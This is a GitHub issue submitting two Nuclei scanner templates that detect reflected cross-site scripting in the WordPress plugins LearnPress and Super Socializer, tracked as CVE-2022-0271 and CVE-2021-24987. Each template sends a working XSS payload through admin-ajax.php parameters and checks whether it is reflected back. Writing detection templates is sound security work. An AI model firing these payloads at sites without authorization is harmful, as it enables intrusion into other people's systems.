### ISSUE TITLE
CVE-2022-0271 & CVE-2021-24987

### ISSUE THREAD

**Issue by Akincibor** [projectdiscovery/nuclei-templates#4143]
```yaml
id: CVE-2022-0271

info:
  name: LearnPress < 4.1.6 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action, leading to a Reflected Cross-Site Scripting
  reference: https://wpscan.com/vulnerability/ad07d9cd-8a75-4f7c-bbbe-3b6b89b699f2
  tags: xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx%3Cimg%20src%3Dx%20onerror=alert(/XSS/)%3E'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<img src=x onerror=alert(/XSS/)>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header
```

```yaml
id: CVE-2021-24987

info:
  name: Super Socializer < 7.13.30 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue.
  reference: https://wpscan.com/vulnerability/a14b668f-812f-46ee-827e-0996b378f7f0
  tags: xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=%3Cimg%20src%3Dx%20onerror=alert(/XSS/)%3E'
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "<img src=x onerror=alert(/XSS/)>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header
```
